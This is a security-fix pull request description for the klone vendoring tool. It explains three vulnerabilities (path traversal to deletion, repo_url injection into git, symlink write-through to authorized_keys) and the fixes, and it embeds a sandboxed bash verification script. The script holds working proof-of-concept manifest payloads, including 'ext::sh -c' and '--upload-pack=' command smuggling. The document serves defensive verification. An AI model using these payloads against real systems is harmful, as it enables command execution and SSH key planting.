| --------- | ------------------ | ---------------------------------------------------------------------- | -------------------------------------------- |
| VC-53816  | CWE-59 / CWE-22    | Symlink traversal in `CloneWithCache` → arbitrary write (e.g. `authorized_keys`) | [`VC-53816`](../../tree/VC-53816)        |
| VC-53817  | CWE-88 / CWE-77    | `repo_url` argument / transport injection → arbitrary command execution | [`VC-53817`](../../tree/VC-53817)            |
| VC-53818  | CWE-22 / CWE-73    | `folder_name` traversal via `filepath.SplitList` misuse → arbitrary delete | [`VC-53818`](../../tree/VC-53818)         |

A single standalone reviewer script — `CVEs/verify-fixes.sh` — covers all
three (four scenarios; VC-53817 has two variants). It is fully sandboxed
under `/tmp/klone-cve-verify.*`, makes no network calls, and is removed
on exit. The script is embedded verbatim at the bottom of this
description.

## The vulnerabilities, briefly

For full vulnerability analysis, fix rationale, and per-test coverage, see
the corresponding per-branch PR descriptions. This section is a précis.

### VC-53818 — `folder_name` traversal

`SyncFolder` tokenised `folder_name` with `filepath.SplitList`, which
splits on the **`PATH` env separator** (`:`/`;`), not on the path
component separator (`/`). A manifest with `folder_name: "..:..:.."`
split into three `..` segments; the resulting `treeNode.Cleanup`
ascended out of the working directory and `os.RemoveAll`'d everything
that wasn't in the (carefully crafted) "expected" tree. Fixing the
splitter exposed a second sink — `Cleanup`'s recursion through expected
intermediates and `CloneWithCache`'s `MkdirAll`+`rsync` both follow
symlinks, so an attacker who landed a symlink on a prior sync could
escape on the next one (same shape as VC-53816, surfaced by the
splitter fix).

### VC-53817 — `repo_url` injection

`repo_url` was passed to `git ls-remote` / `git clone` as an opaque
positional argument. Git accepts two shapes that are not URLs:
`ext::sh -c <cmd>` (the external-transport helper runs `<cmd>` as the
remote process) and any leading `-` (treated as an option;
`--upload-pack=<cmd>` is honoured by both `ls-remote` and `clone`).
Either is arbitrary code execution as the invoking user.

### VC-53816 — symlink traversal in cache rsync

`cache.CloneWithCache` built its destination from a manifest-supplied
`folder_name`, called `os.MkdirAll(dest)` (which follows symlinks), and
ran `rsync -aEq --delete . dest`. A two-source manifest declaring both
`a` and `a/b` let iteration 1 plant a symlink (`b -> /home/victim/.ssh`)
that iteration 2 wrote through, `--delete`'ing the prior contents.

## The fix, briefly

`pkg/sync/sync.go`:
- **`splitFolderName` / `splitTargetName` / `splitManifestPath`**
  replace `filepath.SplitList`. Splits on `/` after GOOS-independent
  backslash normalisation (`strings.ReplaceAll`, not `filepath.ToSlash`,
  so a Linux-authored manifest can't smuggle `a\b` past a Windows
  target). Rejects empty / `.` / `..` segments, absolute paths, Windows
  drive prefixes (`C:`, `C:\…`, `C:/…` — detected on every GOOS via a
  local helper because `filepath.VolumeName` only recognises the shape
  on `GOOS=windows`), and UNC paths. Applied to both `folder_name` and
  the target key.
- **`assertNoSymlinkInTree(root, segments)`** Lstats each cumulative
  path component and rejects symlinks; non-existent tails are treated as
  clean (they'll be created by `MkdirAll` shortly). Called once
  unconditionally on the target (the empty-srcs case still reaches
  `MkdirAll` / `Cleanup`) and once per src before `CloneWithCache`.
- **`treeNode.Cleanup` is bounded to its root.** Lstat-on-root at every
  recursion refuses to operate on a symlinked root, treats
  `os.IsNotExist` on `ReadDir` as "nothing to clean" (the corrected
  splitter makes intermediate directories real, so a first sync of
  `deeply/nested/path` no longer errors out), and refuses to descend
  into `""`/`.`/`..` child names as defence-in-depth.
- **`filepath.EvalSymlinks(workDirPath)`** at `SyncFolder` entry. The
  per-segment Lstat treats `workDirPath` as a trusted root; resolving
  symlinks once up-front stops a caller from shifting the trust boundary
  above the intended directory by invoking klone from inside a
  symlinked path.
- **`mod.ValidateRepoURL(src.RepoURL)`** is called in the per-source
  cleanFn — before `git ls-remote` ever sees `repo_url`.

`pkg/mod/index.go`:
- **`ValidateRepoURL`** enforces an allow-list and shape check. Rejects
  empty, leading `-`, `::` substring (helper transports), and anything
  that is not `https://` / `http://` / `ssh://` / `git://` / `file://`
  / `/abs/path` / scp-like `user@host:path`.

`pkg/download/git/{clone,hash}.go`:
- **`-c protocol.ext.allow=never`** prepended to every `git clone` /
  `git ls-remote` invocation as defence-in-depth against any helper
  transport the validator might miss.
- **`--` end-of-options terminator** before the URL positional, so a
  leading `-` cannot be parsed as an option even if the validator is
  ever bypassed.

`pkg/cache/clone.go`:
- Signature simplified to `CloneWithCache(ctx, destPath, src, getFn)`.
  The symlink pre-flight moved out of the cache layer and into
  `sync.go` where the trusted root (`workDirPath`) and the
  manifest-controlled segments are co-located.

## How to review

### Prerequisites

- `go` 1.23+, `git`, `rsync` on `PATH`.
- A local copy of `CVEs/verify-fixes.sh` (or save the embedded copy
  below to `/tmp/verify-fixes.sh`).

### Step 1 — confirm the CVEs exist on pre-fix `main`

```bash
# from the klone repo root
git fetch upstream
git checkout upstream/main
go build -o /tmp/klone-prefix ./

bash CVEs/verify-fixes.sh /tmp/klone-prefix
echo "exit=$?"
```

**Expected:** exit code `1`. The summary reports at least three of:
```
  VC-53818 (folder_name traversal) : VULNERABLE
  VC-53817 (ext:: transport)       : VULNERABLE  (or BLOCKED_BY_HOST)
  VC-53817 (--upload-pack)         : VULNERABLE
  VC-53816 (symlink traversal)     : VULNERABLE  (or INCONCLUSIVE)
```

Two host-dependent caveats the script auto-detects and prints:

- **VC-53817 `ext::`** — if host git is configured with
  `protocol.ext.allow=never` (modern default), this attack is blocked
  upstream of klone and the script reports `BLOCKED_BY_HOST`. The fix
  for this variant cannot be demonstrated end-to-end on such a host;
  rely on the `--upload-pack` variant (which always fires on pre-fix)
  and on the `TestValidateRepoURL` unit coverage.
- **VC-53816** — requires that the system rsync follows a symlink given
  as the top-level destination. GNU rsync ≥ 3 does; openrsync (the
  default on macOS) does not. The script probes this at startup; if it
  can't reproduce, it reports `INCONCLUSIVE` and skips the pre-fix
  demonstration.

### Step 2 — confirm the fix blocks every demonstrable attack

```bash
# on the CVE-fixes branch
git checkout CVE-fixes
go build -o /tmp/klone-fixed ./

bash CVEs/verify-fixes.sh /tmp/klone-fixed
echo "exit=$?"
```

**Expected:** exit code `0`. Every line reports either `BLOCKED`
(klone refused the attack) or `INCONCLUSIVE` (host can't trigger).
`BLOCKED_BY_HOST` is **not** acceptable here — it means the host's
upstream defence masked klone's, leaving the fix unproven on that host.

### Step 3 — run the Go regression suite

```bash
go test ./...
```

**Expected:** all green. Each per-branch PR description enumerates the
specific tests added for its CVE; the consolidated branch carries all of
them.

## Side-effect statement

`CVEs/verify-fixes.sh` creates everything under
`/tmp/klone-cve-verify.*` and removes it on exit (`KEEP_SANDBOX=1` to
retain). The attack payloads are bounded:

- **VC-53818** — the `..:..:..` payload on an unpatched klone reaches two
  levels above the sandbox's `victim/` dir; those two levels are
  themselves inside `/tmp/klone-cve-verify.*/vc-53818/buffer/`.
- **VC-53817** — both injection payloads `touch` a marker file at a path
  inside `/tmp/klone-cve-verify.*/markers/`.
- **VC-53816** — the symlink points to a stand-in `target-ssh/`
  directory inside `/tmp/klone-cve-verify.*/vc-53816/`, not to the real
  `~/.ssh`.

No file outside the sandbox is created, modified, or deleted at any
point. No network calls are made.

---

<details>
<summary><b>verify-fixes.sh</b> — click to expand the standalone reviewer script</summary>

Save the block below to `/tmp/verify-fixes.sh` (or use
`CVEs/verify-fixes.sh` from this branch directly) before running the
steps above.

```bash
#!/usr/bin/env bash
# CVEs/verify-fixes.sh
# Runs all three klone CVE PoCs against an arbitrary klone binary and prints
# BLOCKED / VULNERABLE per CVE. Exit 0 = all three blocked.
#
# Usage:
#   KLONE=/path/to/klone   bash CVEs/verify-fixes.sh
#   bash CVEs/verify-fixes.sh /path/to/klone
#
# Reviewer workflow:
#   1. Build klone from cert-manager/klone main (pre-fix) and run this script —
#      all three should report VULNERABLE.
#   2. Build klone from the CVE-fix branch and run this script — all three
#      should report BLOCKED.
#
# Side effects: every artifact is created inside a fresh sandbox under /tmp
# and removed on exit (set KEEP_SANDBOX=1 to retain for inspection).
# No file outside the sandbox is created, modified, or deleted.

set -u

KLONE="${KLONE:-${1:-}}"
if [[ -z "$KLONE" ]]; then
    echo "usage: KLONE=/path/to/klone $0   (or pass the path as \$1)" >&2
    exit 2
fi
if [[ ! -x "$KLONE" ]]; then
    echo "error: $KLONE is not an executable file" >&2
    exit 2
fi

for tool in git rsync; do
    if ! command -v "$tool" >/dev/null 2>&1; then
        echo "error: required tool '$tool' not on PATH" >&2
        exit 2
    fi
done

WORK="$(mktemp -d /tmp/klone-cve-verify.XXXXXX)"
if [[ "${KEEP_SANDBOX:-0}" != "1" ]]; then
    trap 'rm -rf "$WORK"' EXIT
fi

# Per-test git identity so the script doesn't depend on the host's git config.
GIT_AUTHOR=("-c" "user.email=verify@example.invalid" "-c" "user.name=verify")

hr() { printf -- '─%.0s' {1..72}; printf '\n'; }
section() { hr; echo "### $*"; hr; }

# Each PoC sets one of these to BLOCKED or VULNERABLE.
RESULT_53816=""
RESULT_53817_ext=""
RESULT_53817_optinject=""
RESULT_53818=""

section "Environment"
echo "klone binary  : $KLONE"
"$KLONE" --version 2>/dev/null || echo "(klone --version returned non-zero; continuing)"
echo "git version   : $(git --version)"
echo "rsync version : $(rsync --version | head -1)"
echo "sandbox       : $WORK"
echo
echo "Note: VC-53816 requires that the system rsync follows a symlink when"
echo "given as the top-level destination ('rsync ... . <dest-symlink>'). GNU"
echo "rsync >= 3 does this; openrsync (macOS default) does not. Checking..."
mkdir -p "$WORK/rsync-probe/src" "$WORK/rsync-probe/real"
echo PAYLOAD > "$WORK/rsync-probe/src/probe"
echo VICTIM  > "$WORK/rsync-probe/real/victim"
ln -s "$WORK/rsync-probe/real" "$WORK/rsync-probe/dest"
( cd "$WORK/rsync-probe/src" && rsync -aEq --delete . "$WORK/rsync-probe/dest" )
if [[ -e "$WORK/rsync-probe/real/probe" && ! -e "$WORK/rsync-probe/real/victim" ]]; then
    RSYNC_FOLLOWS=yes
    echo "rsync probe   : YES — rsync follows top-level dest symlink (VC-53816 fireable)"
else
    RSYNC_FOLLOWS=no
    echo "rsync probe   : NO  — rsync does NOT follow top-level dest symlink on this host"
    echo "                VC-53816 cannot be triggered here; it will be reported as INCONCLUSIVE"
fi
echo

############################################################
# VC-53818 — folder_name traversal via filepath.SplitList
############################################################
section "VC-53818 — folder_name traversal"
SB18="$WORK/vc-53818"
mkdir -p "$SB18/buffer/L3/L2/L1/victim" "$SB18/cache"
# Sentinels at three levels above the working directory.
touch "$SB18/buffer/L3/L2/L1/SENTINEL-L1"
touch "$SB18/buffer/L3/L2/L1/victim/SENTINEL-victim"
touch "$SB18/buffer/L3/L2/SENTINEL-L2"
touch "$SB18/buffer/L3/SENTINEL-L3"

cat > "$SB18/buffer/L3/L2/L1/victim/klone.yaml" <<'EOF'
targets:
  vendored:
    - folder_name: "..:..:.."
      repo_url: /nonexistent-klone-poc-repo
      repo_ref: main
      repo_hash: deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
      repo_path: .
EOF

( cd "$SB18/buffer/L3/L2/L1/victim" && KLONE_CACHE_DIR="$SB18/cache" "$KLONE" sync ) \
    > "$SB18/run.log" 2>&1 || true

# On the vulnerable klone, L1_SENTINEL and SENTINEL-victim are deleted.
# On the patched klone, every sentinel is preserved.
if [[ -e "$SB18/buffer/L3/L2/L1/SENTINEL-L1" \
   && -e "$SB18/buffer/L3/L2/L1/victim/SENTINEL-victim" ]]; then
    RESULT_53818=BLOCKED
    echo "VC-53818: BLOCKED (sentinels above working dir preserved)"
else
    RESULT_53818=VULNERABLE
    echo "VC-53818: VULNERABLE — os.RemoveAll escaped above the working directory"
    echo "          SENTINEL-L1     : $(test -e "$SB18/buffer/L3/L2/L1/SENTINEL-L1" && echo PRESENT || echo DELETED)"
    echo "          SENTINEL-victim : $(test -e "$SB18/buffer/L3/L2/L1/victim/SENTINEL-victim" && echo PRESENT || echo DELETED)"
fi
echo

############################################################
# VC-53817 — repo_url argument/transport injection (two variants)
############################################################
section "VC-53817 — repo_url injection (ext:: helper)"
SB17A="$WORK/vc-53817-ext"
MARKER_EXT="$WORK/markers/klone-pwned-ext"
mkdir -p "$SB17A" "$SB17A/cache" "$WORK/markers"

# Unquoted heredoc so $MARKER_EXT interpolates; \$IFS is preserved so the
# inner /bin/sh launched by git's ext-helper expands it.
cat > "$SB17A/klone.yaml" <<EOF
targets:
  vendored:
    - folder_name: x
      repo_url: "ext::sh -c touch\$IFS${MARKER_EXT}"
      repo_ref: main
      repo_hash: ""
      repo_path: .
EOF

( cd "$SB17A" && KLONE_CACHE_DIR="$SB17A/cache" "$KLONE" sync ) \
    > "$SB17A/run.log" 2>&1 || true

if [[ -e "$MARKER_EXT" ]]; then
    RESULT_53817_ext=VULNERABLE
    echo "VC-53817 (ext::): VULNERABLE — marker $MARKER_EXT was created"
elif grep -q "helper transport" "$SB17A/run.log" 2>/dev/null; then
    RESULT_53817_ext=BLOCKED
    echo "VC-53817 (ext::): BLOCKED by klone (repo_url validator rejected helper transport)"
else
    RESULT_53817_ext=BLOCKED_BY_HOST
    echo "VC-53817 (ext::): BLOCKED by host git (e.g. protocol.ext.allow=never), NOT by klone."
    echo "                  This host cannot demonstrate the vulnerability; klone fix status is unverified here."
fi
echo

section "VC-53817 — repo_url injection (--upload-pack option)"
SB17B="$WORK/vc-53817-optinject"
MARKER_OPT="$WORK/markers/klone-pwned-optinject"
mkdir -p "$SB17B" "$SB17B/cache"

cat > "$SB17B/klone.yaml" <<EOF
targets:
  vendored:
    - folder_name: x
      repo_url: "--upload-pack=touch ${MARKER_OPT};true"
      repo_ref: main
      repo_hash: ""
      repo_path: .
EOF

( cd "$SB17B" && KLONE_CACHE_DIR="$SB17B/cache" "$KLONE" sync ) \
    > "$SB17B/run.log" 2>&1 || true

if [[ -e "$MARKER_OPT" ]]; then
    RESULT_53817_optinject=VULNERABLE
    echo "VC-53817 (--upload-pack): VULNERABLE — marker $MARKER_OPT was created"
elif grep -q "starts with '-'" "$SB17B/run.log" 2>/dev/null; then
    RESULT_53817_optinject=BLOCKED
    echo "VC-53817 (--upload-pack): BLOCKED by klone (repo_url validator rejected leading '-')"
else
    RESULT_53817_optinject=BLOCKED_BY_HOST
    echo "VC-53817 (--upload-pack): BLOCKED upstream of klone (host git or option parser refused)."
    echo "                          This host cannot demonstrate the vulnerability; klone fix status is unverified here."
fi
echo

############################################################
# VC-53816 — symlink traversal in nested folder_name rsync
############################################################
section "VC-53816 — nested folder_name symlink + rsync write-through"
SB16="$WORK/vc-53816"
TGT="$SB16/target-ssh"   # stand-in for /root/.ssh, kept inside the sandbox
mkdir -p "$SB16/srv" "$SB16/project" "$SB16/cache" "$TGT"
echo VICTIM-KEY   > "$TGT/authorized_keys"
echo VICTIM-OTHER > "$TGT/known_hosts"

# repoA: contains symlink b -> $TGT
git init -q --bare "$SB16/srv/repoA.git"
dA="$SB16/repoA-work"; mkdir -p "$dA"
( cd "$dA" && git init -q && ln -s "$TGT" b && git add b \
    && git "${GIT_AUTHOR[@]}" commit -qm a \
    && git push -q "$SB16/srv/repoA.git" HEAD:main )
HASH_A=$(git -C "$dA" rev-parse HEAD)

# repoB: payload authorized_keys
git init -q --bare "$SB16/srv/repoB.git"
dB="$SB16/repoB-work"; mkdir -p "$dB"
( cd "$dB" && git init -q && echo ATTACKER-KEY > authorized_keys \
    && git add authorized_keys \
    && git "${GIT_AUTHOR[@]}" commit -qm b \
    && git push -q "$SB16/srv/repoB.git" HEAD:main )
HASH_B=$(git -C "$dB" rev-parse HEAD)

cat > "$SB16/project/klone.yaml" <<EOF
targets:
  vendored:
    - folder_name: a
      repo_url: $SB16/srv/repoA.git
      repo_ref: main
      repo_hash: $HASH_A
      repo_path: .
    - folder_name: a/b
      repo_url: $SB16/srv/repoB.git
      repo_ref: main
      repo_hash: $HASH_B
      repo_path: .
EOF

( cd "$SB16/project" && KLONE_CACHE_DIR="$SB16/cache" "$KLONE" sync ) \
    > "$SB16/run.log" 2>&1 || true

if [[ "$RSYNC_FOLLOWS" == "no" ]]; then
    RESULT_53816=INCONCLUSIVE
    echo "VC-53816: INCONCLUSIVE — this host's rsync does not follow top-level"
    echo "          dest symlinks, so the attack cannot be demonstrated here."
elif grep -q ATTACKER-KEY "$TGT/authorized_keys" 2>/dev/null; then
    RESULT_53816=VULNERABLE
    echo "VC-53816: VULNERABLE — attacker payload written into $TGT"
    echo "          authorized_keys: $(cat "$TGT/authorized_keys")"
    echo "          known_hosts    : $(test -e "$TGT/known_hosts" && echo PRESENT || echo DELETED)"
elif grep -qE "\(VC-538(16|18)\)" "$SB16/run.log" 2>/dev/null; then
    RESULT_53816=BLOCKED
    echo "VC-53816: BLOCKED by klone (symlink-traversal refusal in sync layer)"
else
    RESULT_53816=BLOCKED_BY_HOST
    echo "VC-53816: BLOCKED upstream of klone (target unchanged, but no klone-side rejection in log)."
    echo "          Inspect $SB16/run.log to understand why."
fi
echo

############################################################
# Summary
############################################################
section "Summary"
printf '  %-32s : %s\n' "VC-53818 (folder_name traversal)" "$RESULT_53818"
printf '  %-32s : %s\n' "VC-53817 (ext:: transport)"       "$RESULT_53817_ext"
printf '  %-32s : %s\n' "VC-53817 (--upload-pack)"         "$RESULT_53817_optinject"
printf '  %-32s : %s\n' "VC-53816 (symlink traversal)"     "$RESULT_53816"
echo
if [[ "${KEEP_SANDBOX:-0}" == "1" ]]; then
    echo "Sandbox preserved at: $WORK"
fi

# Exit 0 iff klone is verified to block every demonstrable CVE.
# INCONCLUSIVE (host can't trigger the bug) is acceptable; BLOCKED_BY_HOST
# (host blocked it but not klone) is not — it means the fix wasn't proven.
exit_code=0
for r in "$RESULT_53818" "$RESULT_53817_ext" "$RESULT_53817_optinject" "$RESULT_53816"; do
    case "$r" in
        BLOCKED|INCONCLUSIVE) ;;
        VULNERABLE)          exit_code=1 ;;
        BLOCKED_BY_HOST)     exit_code=1 ;;
        *)                   exit_code=1 ;;
    esac
done
exit "$exit_code"
```

</details>
